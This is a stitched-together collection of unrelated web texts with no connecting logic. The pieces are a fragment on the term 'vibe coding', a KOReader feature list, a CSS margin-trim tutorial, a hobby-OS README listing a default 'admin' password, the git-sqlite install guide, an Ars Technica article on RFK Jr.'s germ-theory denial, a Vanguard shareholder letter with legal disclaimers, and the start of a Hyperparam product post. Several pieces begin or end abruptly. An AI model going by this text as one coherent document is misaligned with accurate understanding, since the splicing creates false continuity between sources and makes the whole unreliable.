not
software developers—and who don’t want to become developers—learn how to use vibe coding techniques
safely, effectively and responsibly
to solve their problems.
This is a rich, deep topic! Most of the population of the world are never going to learn to code, but thanks to vibe coding tools those people now have a path to building custom software.
Everyone deserves the right to automate tedious things in their lives with a computer. They shouldn’t have to learn programming in order to do that.
That
is who vibe coding is for. It’s not for people who are software engineers already!
There are so many questions to be answered here. What kind of projects can be built in this way? How can you avoid the traps around security, privacy, reliability and a
risk of over-spending
? How can you navigate the jagged frontier of things that can be achieved in this way versus things that are completely impossible?
A book for people like that could be a genuine bestseller! But because three authors and the staff of two publishers didn’t read to the end of the tweet we now need to find a new buzzy term for that, despite having the
perfect
term for it already.
I’d like the publishers and authors responsible to at least understand how much potential value—in terms of both helping out more people and making more money—they have left on the table because they didn’t read all the way to the end of the tweet.
portable
: runs on embedded devices (Cervantes, Kindle, Kobo, PocketBook, reMarkable), Android, and Linux computers. Developers can run a KOReader emulator on Linux and macOS.
multi-format documents
: supports fixed page formats (PDF, DjVu, CBT, CBZ) and reflowable e-book formats (EPUB, FB2, Mobi, DOC, RTF, HTML, CHM, TXT). Scanned PDF/DjVu documents can also be reflowed with the built-in K2pdfopt library.
ZIP files
are also supported for some formats.
full-featured reading
: multi-lingual user interface with a highly customizable reader view and many typesetting options. You can set arbitrary page margins, override line spacing and choose external fonts and styles. It has multi-lingual hyphenation dictionaries bundled into the application.
integrated
with
calibre
(search metadata, receive ebooks wirelessly, browse library via OPDS),
Wallabag
,
Wikipedia
,
Google Translate
and other content providers.
optimized for e-ink devices
: custom UI without animation, with paginated menus, adjustable text contrast, and easy zoom to fit content or page in paged media.
extensible
: via plugins
fast
: on some older devices, it has been measured to have less than half the page-turn delay of the built-in reading software.
and much more
: look up words with StarDict dictionaries / Wikipedia, add your own online OPDS catalogs and RSS feeds, over-the-air software updates, an FTP client, an SSH server, …
Please check the
user guide
and the
wiki
to discover more features and to help us document them.
Screenshots
Installation
Please follow the model-specific steps for your device:
If you write a lot of CSS, you are familiar with those moments when you aren’t quite sure how to accomplish what you want to accomplish. Usually, you’ll turn to tutorials or documentation, and learn more about CSS to get your work done. But every once in a while, you realize there is no “proper” way to do what you want to do. So you come up with (or borrow) a solution that feels hacky. Maybe it requires a lot of complex selectors. Or maybe it works for the content you have at the moment, but you worry that someday, someone might throw different HTML at the site, and the solution you wrote will break.
CSS has matured a lot over the last decade. Many robust solutions filled in gaps that previously required fragile hacks. And now, there’s one more —
margin-trim
.
Margin trim
The
margin-trim
property lets you tell a container to trim the margins off its children — any margins that push up against the container. In one fell swoop, all of the space between the children and the container is eliminated.
This also works when the margins are on the grandchildren or great-grandchildren, or great-great-great-great-grandchildren. If there is space created with margins on any of the content inside the container, and that space butts up against the container, it’s trimmed away when
margin-trim
is applied
to the container.
Let’s imagine a practical example. Let’s say we have multiple paragraphs inside an
article
element, and those paragraphs have margins. At the same time, the container has padding on it.
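Something like this, as a sketch (the 1lh and 2lh values match the discussion below):
article {
  padding: 2lh;
}
p {
  margin-block: 1lh;
}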
This is very typical code. The padding on the container is supposed to create an even amount of space all the way around the box, but instead there’s extra white space above and below the content. Like this:
By
using
1lh
for the margins between the paragraphs
, and
2lh
for the padding on the
article
box, we’re attempting to create a beautiful typographic layout. Let’s turn on some guides to better see where the extra space is coming from. The padding on the article box is seen here in yellow, while the paragraph margins are marked in green.
The margins on the first and last paragraphs (
1lh
) are being added to the padding (
2lh
) to create a space in the block direction that measures
3lh
.
It will be better for the design if we get rid of the margin above the first paragraph and the margin below the last paragraph. Before we had
margin-trim
, we would attempt to remove the margins from the first and last paragraphs, or lessen the padding in the block direction… but any approach we take will be dependent on the content inside. Perhaps another instance of this
article
will start with a headline that has a different amount for a top margin. Or start with an image that has no margin.
Without being 100% sure of what kind of content will be in the box, it’s hard to guarantee the spacing will come out as desired. Until now.
The new
margin-trim
property gives us an easy way to ask directly for what we want. We can tell the box to eliminate any margins that are butting up against that box.
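In our example, that is a single declaration on the container. A sketch:
article {
  margin-trim: block;
}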
Now the browser automatically chops off any margins that touch the edge of the
article
box in the block direction — in this case the top and bottom of the box.
Note that while the margins are defined on the
<p>
element, you declare
margin-trim
on the
<article>
element. You always apply
margin-trim
to the container, not the element that has the margin in the first place.
Here’s the end result.
Try it yourself
You can try out
margin-trim
in
this live demo
, in Safari 16.4 or greater.
Browser Support
Support for
margin-trim
shipped in Safari over two years ago. But so far, Safari is the only
browser with support
. So what should you do for browsers without support? For our demo, you could write fallback code inside of feature queries, like this:
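A sketch of that fallback, assuming the same article and paragraph structure as the demo:
article {
  margin-trim: block;
}
@supports not (margin-trim: block) {
  article > :first-child {
    margin-block-start: 0;
  }
  article > :last-child {
    margin-block-end: 0;
  }
}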
This helps to clarify the difference between
margin-trim
and the older techniques we’ve been using.
When using
:first-child
and
:last-child
any element that’s the first or last
direct child of the container
will have its margins trimmed. But any content that either isn’t wrapped in an element, or that is nested further down in the DOM structure will not.
For example, if the first element is a figure with a top margin, and the figure contains an image that also has a top margin, both of those margins will be trimmed by
margin-trim
, while only the figure margin will be trimmed by
:first-child
.
CSS has never been better. It’s my hope you learn about small improvements like this one, and use them to write more robust code. Let me know what you think on
Bluesky
or
Mastodon
. I’d love to hear your stories, feature requests, and questions.
OSS command-line AI assistant inspired by OpenAI Codex for local LLMs
There are 3 default users: system, admin and guest. The password for admin is 'admin', while guest has no password.
Currently there is no difference between admin and guest.
You can create a user with the 'admin' command:
admin create <username> <password>
Built With
This project is built with C and Assembly for the kernel, utilities, and build system; C++ for userspace applications; and Make for compilation.
Docker is used for cross-platform compilation.
Check that all dependencies are installed (only for Debian-based distros)
Initialize Git submodules (C-Compiler)
git submodule update --init --recursive
Compile and create image
Launch QEMU
Use GRUB (Optional)
MacOS
Currently macOS cannot natively compile the build tools, as they depend on 32-bit x86 code.
Docker is the simplest way if you still wish to compile the operating system.
git-sqlite is a collection of shell scripts that allows a sqlite database
to be tracked using the git version control system.
It can be used on an existing database; however, UUIDs will make
multi-master distribution substantially easier.
See src/schema.sql after building the project for an example.
USAGE GUIDE
create a new database using the git-sqlite example schema:
git-sqlite init newdatabase.db
attach the database to your repository (has to be done once for each repo):
git-sqlite attach newdatabase.db
show a diff using the git-sqlite diff driver:
git show-sql <COMMIT SHA>
resolve a merge conflict (after manually editing the merge_file)
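Putting it together, a typical tracked-edit session might look like this (a sketch using only the commands above plus ordinary git; the file name and commit messages are illustrative):
git-sqlite init newdatabase.db        # create the database from the example schema
git-sqlite attach newdatabase.db      # register the diff driver for this repo
git add newdatabase.db
git commit -m "add tracked database"
sqlite3 newdatabase.db                # make some edits to the data
git commit -am "edit the data"
git show-sql HEAD                     # review the change as SQL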
INSTALLING GIT-SQLITE
Dependencies:
sqlite3
sqldiff
bash
git
autotools (build-essential debian repositories)
As of Debian Stretch (release 9), sqldiff is included with the default sqlite3 apt package.
If it is not available for your distribution, see
INSTALLING SQLDIFF
below.
If you are installing from the git src:
./reconf
./configure
sudo make install
If you are installing from a release, do this:
./configure
sudo make install
INSTALLING SQLDIFF
wget https://www.sqlite.org/src/tarball/sqlite.tar.gz?r=release
tar xzf sqlite.tar.gz?r=release
cd sqlite
./configure
make sqldiff
sudo install sqldiff /usr/local/bin/
In his 2021 book vilifying Anthony Fauci, RFK Jr. lays out support for an alternate theory.
Health and Human Services Secretary Robert F. Kennedy Jr. speaks at a news conference on removing synthetic dyes from America's food supply, at the Health and Human Services Headquarters in Washington, DC on April 22, 2025.
Credit:
Getty | Nathan Posner
With the rise of Robert F. Kennedy Jr., brain worms have gotten a bad rap.
A year ago, the long-time anti-vaccine advocate and current US health secretary famously told The New York Times that a parasitic worm "
got into my brain and ate a portion of it and then died
." The startling revelation is now frequently referenced whenever Kennedy says something outlandish, false, or offensive—which is often. For those who have followed his anti-vaccine advocacy, it's frightfully clear that, worm-infested or not, Kennedy's brain is marinated in wild conspiracy theories and dangerous misinformation.
While it's certainly possible that worm remnants could impair brain function, it remains unknown if the worm is to blame for Kennedy's cognitive oddities. For one thing, he was also diagnosed with mercury poisoning, which can cause brain damage, too. As prominent infectious disease expert Anthony Fauci said last June
in a conversation
with political analyst David Axelrod: "I don't know what's going on in [Kennedy's] head, but it's not good."
The trouble is that now that Kennedy is the country's top health official, his warped ideas are contributing to the rise of a dystopian reality. Federal health agencies are spiraling into chaos, and critical public health services for Americans have been brutally slashed, dismantled, or knee-capped—from
infectious disease responses
, the
lead poisoning team
, and
Meals on Wheels
to
maternal health programs
and
anti-smoking initiatives
, just to name a few. The health of the nation is at stake; the struggle to understand what goes on in Kennedy's head is vital.
While we may never have definitive answers on his cognitive situation, one thing is plain: Kennedy's thoughts and actions make a lot more sense when you realize he doesn't believe in a foundational scientific principle: germ theory.
Dueling theories
Germ theory is, of course, the 19th-century proven idea that microscopic germs—pathogenic viruses, bacteria, parasites, and fungi—cause disease. It supplanted the leading explanation of disease at the time,
the miasma theory
, which suggests that diseases are caused by
miasma
, that is, noxious mists and vapors, or simply bad air arising from decaying matter, such as corpses, sewage, or rotting vegetables. While the miasma theory was abandoned, it is
credited with spurring improvements in sanitation and hygiene
—which, of course, improve health because they halt the spread of germs, the cause of diseases.
Germ theory also knocks back a lesser-known idea called the terrain theory, which
we've covered before
. This is a somewhat ill-defined theory that generally suggests diseases stem from imbalances in the internal "terrain" of the body, such as malnutrition or the presence of toxic substances. The theory is linked to ideas by French scientist Antoine Béchamp and French physiologist Claude Bernard.
Béchamp, considered a bitter crank and rival to famed French microbiologist Louis Pasteur, is perhaps best known for wrongly suggesting the basic unit of organisms is not the cell, but nonexistent microanatomical elements he called "
microzyma
." While the idea was
largely ignored by the scientific community
, Béchamp suggested that disruptions to microzyma are a predisposition to disease, as is the state of the body's "terrain." French physiologist Claude Bernard, meanwhile, came up with an idea of balance or stability of the body's internal environment (
milieu intérieur
), which was a precursor to the concept of homeostasis. Ideas from the two figures came together to create an ideology that has been enthusiastically adopted by modern-day germ theory denialists, including Kennedy.
It's important to note here that our understanding of Kennedy's disbelief in germ theory isn't based on speculation or deduction; it's based on Kennedy's own words. He wrote an entire section on it in his 2021 book vilifying Fauci, titled
The Real Anthony Fauci
.
The section is titled "Miasma vs. Germ Theory," in the chapter "The White Man's Burden."
But we did reach out to Health and Human Services to ask how Kennedy's disbelief in germ theory influences his policy decisions. HHS did not respond.
Kennedy’s beliefs
In the chapter, Kennedy promotes the "miasma theory" but gets the definition completely wrong. Instead of actual miasma theory, he describes something more like terrain theory. He writes: "'Miasma theory' emphasizes preventing disease by fortifying the immune system through nutrition and by reducing exposures to environmental toxins and stresses."
Kennedy contrasts his erroneous take on miasma theory with germ theory, which he derides as a tool of the pharmaceutical industry and pushy scientists to justify selling modern medicines. The abandonment of miasma theory, Kennedy bemoans, realigned health and medical institutions to "the pharmaceutical paradigm that emphasized targeting particular germs with specific drugs rather than fortifying the immune system through healthy living, clean water, and good nutrition."
According to Kennedy, germ theory gained popularity, not because of the undisputed evidence supporting it, but by "mimicking the traditional explanation for disease—demon possession—giving it a leg up over miasma."
To this day, Kennedy writes, a "$1 trillion pharmaceutical industry pushing patented pills, powders, pricks, potions, and poisons, and the powerful professions of virology and vaccinology led by 'Little Napoleon' himself, Anthony Fauci, fortify the century-old predominance of germ theory."
In all, the chapter provides a clear explanation of why Kennedy relentlessly attacks evidence-based medicines; vilifies the pharmaceutical industry;
suggests HIV doesn't cause AIDS and antidepressants are behind mass shootings
; believes that vaccines are harmful, not protective; claims
5G wireless networks cause cancer
; suggests chemicals in water are changing children's gender identities; and is quick to promote supplements to prevent and treat diseases, such as recently recommending vitamin A for measles and falsely claiming children who die from the viral infection are malnourished.
A religious conviction
For some experts, the chapter was like a light bulb going on. "I thought 'it now all makes sense'... I mean, it all adds up," Paul Offit, pediatrician and infectious disease expert at Children's Hospital of Philadelphia, told Ars Technica. It's still astonishing, though, he added. "It's so unbelievable, because you can't imagine that someone who's the head of Health and Human Services doesn't believe that specific viruses or bacteria cause specific diseases, and that the prevention or treatment of them is lifesaving."
Offit has a dark history with Kennedy. Around 20 years ago, Kennedy called Offit out of the blue to talk with him about vaccine safety. Offit knows a lot about it—he's not only an expert on vaccines, he's the
co-inventor of one
.
The vaccine he co-developed
,
RotaTeq
, protects against rotaviruses, which cause deadly diarrheal disease in young children and killed an
estimated 500,000 people worldwide each year
before vaccines were available. RotaTeq has been proven safe and effective and is credited with
saving tens of thousands of lives
around the world each year.
Kennedy and Offit spent about an hour talking, mostly about thimerosal, an ethylmercury-containing preservative that was once used in childhood vaccines but was mostly abandoned by 2001 as a precautionary measure. RotaTeq doesn't and never did contain thimerosal—because it's a live, attenuated viral vaccine, it doesn't contain any preservatives. But Kennedy has frequently used thimerosal as a vaccine bogeyman over the years, claiming it causes harms (
there is no evidence for this
).
After their conversation, Kennedy published a story in Rolling Stone and Salon.com titled "
Deadly Immunity
," which erroneously argued that thimerosal-containing vaccines cause autism. The article was riddled with falsehoods and misleading statements. It described Offit as "
in the pocket
" of the pharmaceutical industry and claimed RotaTeq was "laced" with thimerosal. Rolling Stone and Salon amended some of the article's problems, but eventually Salon retracted it and Rolling Stone deleted it.
Looking back, Offit said he was
sandbagged
. "He's a liar. He lied about who he was; he lied about what he was doing. He was just wanting to set me up," Offit said.
Although that was the only time they had ever spoken, Kennedy has continued to disparage and malign Offit over the years. In his book dedicated to denigrating Fauci, Kennedy spends plenty of time spitting insults at Offit, calling him a "font of wild industry ballyhoo, prevarication, and outright fraud." He also makes the wildly false claim that RotaTeq "almost certainly kills and injures more children in the United States than the rotavirus disease."
Inconvincible
Understanding that Kennedy is a germ theory denialist and terrain theory embracer makes these attacks easier to understand—though no less abhorrent or dangerous.
"He holds these beliefs like a religious conviction," Offit said. "There is no shaking him from that," regardless of how much evidence there is to prove him wrong. "If you're trying to talk him out of something that he holds with a religious conviction—that's never going to happen. And so any time anybody disagrees with him, he goes, 'Well, of course, they're just in the pocket of industry; that's why they say that.'"
There are some aspects of terrain theory that do have a basis in reality. Certainly, underlying medical conditions—which could be considered a disturbed bodily "terrain"—can make people more vulnerable to disease. And, with recent advances in understanding the microbiome, it has become clear that imbalances in the microbial communities in our gastrointestinal tracts can also predispose people to infections.
But, on the whole, the evidence against terrain theory is obvious and all around us. Terrain theorists consider disease a symptom of an unhealthy internal state, suggesting that anyone who gets sick is unhealthy and that all disease-causing germs are purely opportunistic. This is nonsense: Plenty of people fall ill while being otherwise healthy. And many germs are dedicated pathogens, with evolved, specialized virulence strategies such as toxins, and advanced defense mechanisms such as antibacterial resistance. They are not opportunists.
Terrain theory's clash with reality has become painfully apparent amid Kennedy's handling—or more accurately, mishandling—of the current measles situation in the US.
Most health experts would consider the current measles situation in the US akin to a five-alarm fire. An outbreak that began at the end of January in West Texas is now the largest and deadliest the country has seen in a quarter-century. Three people have died, including two unvaccinated young children who were otherwise healthy. The outbreak has spread to at least three other states, which also have undervaccinated communities where the virus can thrive. There's no sign of the outbreak slowing, and the nation's overall case count is on track to be the highest since the mid-1990s, before measles was declared eliminated in 2000. Modeling indicates the country will lose its elimination status and that measles will once again become endemic in the US.
Given the situation, one might expect a vigorous federal response—one dominated by strong and clear promotion of the highly effective, safe measles vaccine. But of course, that's not the case.
"When those first two little girls died of measles in West Texas, he said immediately—RFK Jr.—that they were malnourished. It was the doctors that stood up and said 'No, they had no risk factors. They were perfectly well-nourished,'" Offit points out.
Kennedy has also heavily pushed the use of vitamin A, a fat-soluble vitamin that accumulates in the body and can become toxic with large or prolonged doses. It does not prevent measles and is mainly used as supportive care for measles in low-income countries where vitamin A deficiency is common. Nevertheless, vaccine-hesitant communities in Texas have embraced it, leading to reports from doctors that they have had to
treat children for vitamin A toxicity
.
Poisons
Despite the raging outbreak, Kennedy spent part of last week drumming up fanfare for a rickety plan to rid American foods of artificial food dyes, which are accused of making sugary processed foods more appealing to kids, in addition to posing their own health risks. It's part of his larger effort to improve Americans' nutrition, a tenet of terrain theory. Though Kennedy has organized zero news briefings on the measles outbreak, he appeared at a jubilant press conference on removing the dyes.
The conference was complete with remarks from people who seem to share beliefs similar to Kennedy's, including famed pseudoscience-peddler Vani Hari, aka "Food Babe," and alternative-medicine guru and fad diet promoter Mark Hyman. Wellness mogul and special government employee Calley Means also took to the podium to give a fury-filled speech in which he claimed that 90 percent of FDA's spending is because we are "poisoning our children," echoing
a claim Kennedy has also made
.
Kennedy, for his part, declared that "sugar is poison," though he acknowledged that the FDA can't ban it. While the conference was intended to celebrate the removal of artificial food dyes, he also acknowledged that there is no ban, nor forthcoming regulations, or even an agreement with food companies to remove the dyes. Kennedy instead said he simply had "an understanding" with food companies. FDA Commissioner Marty Makary explained the plan by saying: "I believe in love, and let’s start in a friendly way and see if we can do this without any statutory or regulatory changes." Bloomberg reported the next day that food industry lobbyists said
there is no agreement to remove the dyes
.
However feeble the move, a focus on banning colorful cereal during a grave infectious disease outbreak makes a lot of sense if you know that Kennedy is a germ theory denialist.
But then again, there's also the brain worm.
Fifty years ago today, Jack Bogle started a different kind of investment firm—one owned by its investors, ensuring a focus on making money for them, not from them.
1
Hear from our founder what makes Vanguard different
Read the transcript
John C. Bogle:
What made Vanguard different from everybody else in this industry was the structure that I picked in the first place, way back in 1974. We are owned by the shareholders. Our mission is to serve them and not some outside management company owner.
And I don't think it's self-serving to say that we are a company that is of the shareholder, by the shareholder, and for the shareholder, with a crew that understands that and implements it really quite beautifully.
People are the key to everything we do and everything we ever have done. I've often talked about human beings being the hallmark of this operation—people that care about our values, people that care about our integrity, each with their own hopes and fears and financial goals.
Read more
Vanguard was founded on the ideal that all investors deserve a fair shake—that investing ought to be lower-cost and more accessible. Bogle’s idealism was audacious at the time. In 1975, investing was reserved for the very wealthy and was stubbornly expensive, and the U.S. stock market was down by half over the prior couple of years.
The "Vanguard experiment" did not take off right away, but as generations of crew persistently took action to bring us closer to our founding ideals, more people were attracted to what we had to offer. Today, more than 50 million investors have entrusted Vanguard with their financial hopes—a responsibility we embrace with great care.
I am writing first to thank you for your trust in Vanguard. It is a trust that demands our constant effort, especially given the market fluctuations this year. So, I also want to highlight actions we are taking to serve your needs today and for the long term. Finally, I offer our unwavering commitment that Vanguard will always be your firm, one that takes a stand for your needs and where our focus is on your long-term investment success.
Lowering cost matters to performance – in index and active portfolios
One of Bogle’s contrarian insights was that in investing, you get what you
don’t
pay for. The less you pay for your funds, the more you keep. A benefit of being a Vanguard investor-owner is that as we realize greater economies of scale, we pass those savings on to you through lower fees.
It is why
Vanguard has reduced expense ratios more than two thousand times.
Our relentless focus on fees is also why this February we announced the largest expense ratio cuts in our history—we expect our U.S. investors to save more than $350 million this year alone.
2
The Vanguard Effect has also spurred price competition across the industry, as our low-cost offerings draw attention to the importance of fees to long-term results.
Helping investors keep more of their returns
Annual cost of hypothetical $10,000 investments
3
Sources:
Vanguard and Morningstar, Inc. as of December 31, 2024.
Bogle’s insight was contrarian because lower-cost portfolios tend to outperform higher-cost ones—in both index and active funds.
4
Skilled, low-fee active managers can be more prudent and disciplined than higher-fee managers who can feel compelled to take on greater risk to offset their higher fees. This is the main reason why Vanguard’s index and active funds have outperformed over the past decade.
Percentage of Vanguard funds that have outperformed the competition
5
Ten years ended December 31, 2024
Sources:
Vanguard, based on data from LSEG Lipper.
Extending The Vanguard Effect to fixed income and cash savings
If the market turmoil of the past few months has highlighted one thing, it is the importance of diversification—especially between stocks and bonds. Bonds can be sound diversifiers and, as
Vanguard’s long-term outlook
indicates, they can be good sources of return and income—which is especially important if you are retired.
The bond market is significantly larger than the stock market and much more complex and inefficient, providing greater opportunities for active management to outperform. But competitors’ fees for active fixed income have remained persistently high. You deserve a better deal.
6
At Vanguard we have been managing fixed income portfolios for forty years. Our combination of high skill and low fees (a quarter of the industry average) has resulted in
92% of our active fixed income funds outperforming
their peer group averages over the last 10 years.
7
You also deserve a better deal on cash savings. Vanguard’s money market funds already provide strong performance at low fees, but you probably also hold traditional savings accounts—whether for the convenience of paying bills or for FDIC insurance. The typical savings account yields less than half a percent.
Knowing we could do far better than that, we launched our Cash Plus offer. At present, it pays 3.65%, nearly 9x what you could earn with the average savings account, and it includes features like the ability to pay bills and FDIC insurance.
8
In two years, a Cash Plus account with a $10,000 balance could have earned nearly $1,000 more with our bank sweep program than with a traditional bank savings account.
9
Beyond extending The Vanguard Effect to fixed income and cash, we are expanding our long-standing alliances with third-party managers to provide better access to institutional-quality private assets and guaranteed income solutions — as we believe they can play a role in certain long-term portfolios. We are at work developing solutions for your needs and will have more to announce on that front later this year.
Investing to lead in client experience
Spending time with clients and crew since I joined Vanguard last year, I’ve heard firsthand your frustration when our service hasn’t met your expectations.
It’s something we have been focused on improving and our efforts are beginning to shine through.
Our client satisfaction ranks number one according to the JD Power 2025 U.S. Do-it-Yourself Investor Satisfaction Study released last month.
10
We have nearly completed modernizing our personal investor technology, moving off legacy mainframe systems to cloud computing, and we expect to be in a similar position with workplace retirement in about a year. This means you can count on our technology to be much more responsive and resilient, and for your digital experience to be improving at a much swifter pace.
To meet and stay ahead of your needs—
we’ve more than doubled our technology investments over the past five years.
In 2025, we will invest $3 billion in our platforms and capabilities, including artificial intelligence, digital channels, and phone and chat services, to ensure we serve you well.
Democratizing advice and investor choice
We recently stood up a new Advice & Wealth Management group. We have been offering advice for over a decade and see it as central to helping investors reach their goals. Our new group is a response to more investors wanting us to scale our offering and expand in specialized areas like tax and estate planning.
Last fall,
we lowered the investment minimum to $100 for our award-winning U.S. Digital Advisor service.
11
We are also bringing our tradition of low fees to advice, offering high quality, full-service advisors for an annual fee of 0.3%—roughly a quarter of the industry average.
12
We seek to democratize more than advice—including how you vote the shares of the companies you own through Vanguard funds. For the 2025 proxy voting season, our pioneering Vanguard
Investor Choice
program will apply to $250 billion in assets, nearly double our 2024 program pilot.
Thank you for your trust
Jack Bogle founded Vanguard because he believed it was possible for people to invest for the long term, with simplicity and integrity, and at low cost. Fifty years later, all of us crew members at Vanguard see ourselves as stewards of this mission.
Even as the current economic outlook and markets are in a state of flux, I want to reassure you that our mission—to give
you
the best chance for investment success—is steadfast. We are also evolving, taking action to ensure we remain zealous in the pursuit of your success.
Thank you for entrusting Vanguard with your hard-earned savings. I look forward to reporting back to you next year on our progress.
Related content
1 Vanguard is owned by its funds, which are owned by Vanguard’s fund shareholder clients.
2 Comparison uses AUM as of 11/2024. There is no guarantee that any individual investor will save money due to the reductions in expense ratios. Figures are estimates and should not be relied on. For illustrative purposes only. See
corporate.vanguard.com/feecuts
for details.
3 Data assume that a pair of constant $10,000 portfolios are invested in Vanguard funds and non-Vanguard funds and divided to reflect the relative market share of each fund, based on its actual assets under management over time. Data reflect actual fund expense ratios of all U.S.-domiciled mutual funds and exchange-traded funds, as of December 31, 2024.
5 For the ten-year period ended December 31, 2024, 6 of 6 Vanguard money market funds, 70 of 97 bond funds, 21 of 23 balanced funds, and 168 of 191 stock funds, or 265 of 317 Vanguard funds overall, outperformed their peer group averages. Results will vary for other time periods. Only U.S.-domiciled funds with a minimum ten-year history were included in the comparison. The competitive performance data shown represent past performance, which is not a guarantee of future results. All investments are subject to risks. For the most recent performance, visit
vanguard.com/performance
.
6 The dollar-weighted average expense ratio for actively managed, non-Vanguard fixed income mutual funds and ETFs is 0.53%, more than five times the equivalent Vanguard expense ratio of 0.10%. Source: Vanguard calculations using Morningstar data. Expense ratios weighted by assets as of November 30, 2024.
7 For the ten-year period ended December 31, 2024, 6 of 6 Vanguard money market funds and 40 of 44 actively managed bond funds, or 46 of 50 Vanguard active fixed income funds overall, outperformed their peer group averages. Results will vary for other time periods. Only funds with a minimum ten-year history were included in the comparison. The competitive performance data shown represent past performance, which is not a guarantee of future results. All investments are subject to risks. For the most recent performance,
visit vanguard.com/performance
.
8 The Vanguard Cash Plus Account program APY (annual percentage yield) is 3.65% as of April 30, 2025. The APY will vary and may change at any time. Source for average bank savings yield of 0.41%: FDIC National Rates and Rate Caps as of February 18, 2025. Cash Plus bank sweep program APY is current as of date of publication. Current APY is available at vanguard.com. The Vanguard Cash Plus Account is a brokerage account offered by Vanguard Brokerage Services, a division of Vanguard Marketing Corporation, member FINRA. Some third-party institutions may not accept the Cash Plus Account routing number for transactions. If you have any issues using the routing number on a third-party website, contact the provider. There may be other material differences between these products that must be considered prior to investing.
Bank Sweep program balances are held at one or more Program Banks, earn a variable rate of interest, and are not securities covered by SIPC. They are not cash balances held by Vanguard Brokerage Services, a division of Vanguard Marketing Corporation (VMC); VMC is not a bank. Balances are eligible for FDIC insurance subject to applicable limits. See the list of
participating Program Banks
.
9 Source: Vanguard and FDIC National Rates and Rate Caps. This example is for illustrative purposes only and does not represent the return on any particular investment. It assumes a $10,000 investment, no additional transactions are made and factors in compounding. It is based on an estimate of total interest earned during the period May 24, 2022, through December 30, 2024, using the Vanguard Cash Plus bank sweep program’s actual daily APY (annual percentage yield will vary and may change at any time). For savings accounts, the applicable monthly APY according to FDIC National Rates and Rate caps was used as the daily APY for each month presented (During this time the average APY rate for Savings was 0.46%, and the Cash Plus Account was 4.15%.) There may be other material differences between these products that must be considered prior to investing, including the level of risk associated with each product type.
Past performance is no guarantee of future results.
10 The
J.D. Power 2025 U.S. Investor Satisfaction Study
surveyed approximately 4,000 self-directed investors. Vanguard previously secured the number 1 ranking in 2021, 2022, and 2023, and the number 2 ranking in 2024. The survey was fielded between January and December 2024 and measured satisfaction in seven key dimensions on a 1,000-point scale: product and service offerings meet investors’ needs; ease in doing business with the firm; digital channels; people; value for fees paid; and level of trust with the firm.
For J.D. Power 2025 award information, visit
jdpower.com/awards
. Use of study results in promotional materials is subject to a license fee; no compensation was provided for award consideration.
12 According to Cerulli research, the industry average asset-based advisory fee ranges from 1.25% for a client with $100,000 in investable assets to 0.67% for a client with $10 million. Advisory fees exclude products’ embedded management fees and are self-reported by advisors. Source: Cerulli Associates. The Cerulli Edge: The Americas Asset and Wealth Management Edition: The Fees Issue, March 2025.
Vanguard Personal Advisor Select and Vanguard Personal Advisor Wealth Management charge fees based on a tiered fee schedule (maximum 0.30%) calculated as an average advisory fee on all advised assets. Vanguard Digital Advisor charges Vanguard Brokerage Accounts an annual gross advisory fee of 0.20% for its all-index investment options and 0.25% for an active/index mix. Vanguard Personal Advisor charges Vanguard Brokerage Accounts an annual gross advisory fee of 0.35% for its all-index investment options and 0.40% for an active/index mix. Vanguard Digital Advisor and Vanguard Personal Advisor reduce those fees by the amount of revenue that Vanguard (or a Vanguard affiliate) retains from your portfolio in order to calculate your net advisory fee. Note that this fee doesn't include investment expense ratios charged by a fund, such as fees paid to the funds' third-party managers which are not credited. While we generally recommend using low-cost Vanguard funds to build your portfolio, actively managed funds will have higher expense ratios than index funds. Please review each service's advisory brochure for more fee information. You should consult your plan fee disclosure notice for the applicable annual gross advisory fees that apply to your 401(k) account.
IMPORTANT INFORMATION:
For more information about Vanguard funds, visit vanguard.com to obtain a prospectus or, if available, a summary prospectus. Investment objectives, risks, charges, expenses, and other important information are contained in the prospectus; read and consider it carefully before investing.
All investing is subject to risk, including possible loss of principal. Diversification does not ensure a profit or protect against a loss. Past performance is not a guarantee of future results.
Bond funds are subject to the risk that an issuer will fail to make payments on time, and that bond prices will decline because of rising interest rates or negative perceptions of an issuer's ability to make payments.
Vanguard is reducing expense ratios for certain share classes of some funds. There is no guarantee that any individual investor will save money due to the reductions in fund expense ratios. Not all fund share classes will have a reduced expense ratio and therefore not all investors will experience the estimated savings. Investors that purchase the relevant funds after the expense ratios have been reduced will not experience savings. Savings means future money not spent on expense ratios and does not entail a rebate or deposit of any sort. Savings figures are estimates and should not be relied upon. Savings is based on data as of November 30, 2024; if other data is used, savings may differ. Estimated savings accrue to existing investors holding relevant share classes for 2024 and 2025. For illustrative purposes only. Past performance is not indicative of future results.
The Vanguard Cash Plus Account is a brokerage account offered by Vanguard Brokerage Services, a division of Vanguard Marketing Corporation, member FINRA and SIPC. Under the Sweep Program, Eligible Balances swept to Program Banks are not securities: they are not covered by SIPC, but are eligible for FDIC insurance, subject to applicable limits. Money market funds held in the account are not guaranteed or insured by the FDIC, but are securities eligible for SIPC coverage. See the
Vanguard Bank Sweep Products Terms of Use
and
Program Bank list
for more information.
Savings accounts may have characteristics that differentiate them from bank sweep programs offered by Vanguard Cash Plus. For example, they may offer overdraft protection, ATM access (immediate access to your money), and other convenience features. Each company's products differ, so it's important to ask questions to understand account features.
Vanguard advice services are provided by Vanguard Advisers, Inc. ("VAI"), a registered investment advisor, or by Vanguard National Trust Company ("VNTC"), a federally chartered, limited-purpose trust company. VAI and VNTC are subsidiaries of The Vanguard Group, Inc., and affiliates of Vanguard Marketing Corporation ("VMC"). Neither VAI, VNTC, nor its affiliates guarantee profits or protection from losses.
Show HN: Hyperparam: OSS Tools for Exploring Datasets Locally in the Browser
Hyperparam was founded to address a critical gap in the machine learning ecosystem: the lack of a user-friendly, scalable UI for exploring and curating massive datasets.
Our mission is grounded in the belief that data quality is the most important factor in ML success, and that better tools are needed to build better training sets. In practice, this means enabling data scientists and engineers to
“look at your data”
– even terabyte-scale text corpora – interactively and entirely in-browser without heavy infrastructure. By combining efficient data formats, high-performance JavaScript libraries, and emerging AI assistance, Hyperparam's vision is to put data quality front and center in model development. Our motto
“the missing UI for AI data”
reflects our goal to make massive data exploration, labeling, and quality management as intuitive as modern web apps, all while respecting privacy and compliance through a local-first design.
Mission and Vision: Data-Centric AI in the Browser
Our mission is to empower ML practitioners to create the best training datasets for the best models. This stems from an industry-wide realization that
model performance is ultimately bounded by data quality
, not just model architecture or hyperparameters. Hyperparam envisions a new workflow where:
Interactive Data Exploration at Scale:
Users can freely explore huge datasets (millions or billions of records) with fast, free-form interactions to uncover insights. Unlike traditional Python notebooks that struggle with large data (often requiring downsampling or clunky pagination), Hyperparam leverages browser technology for a smooth UI.
AI-Assisted Curation:
